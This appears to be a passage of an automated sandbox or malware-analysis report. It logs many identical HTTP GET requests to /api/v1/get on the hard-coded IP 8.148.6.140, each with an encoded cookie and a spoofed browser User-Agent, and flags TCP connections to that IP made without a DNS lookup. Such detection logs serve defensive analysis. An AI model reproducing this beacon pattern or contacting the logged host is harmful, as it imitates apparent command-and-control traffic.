Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.6.140
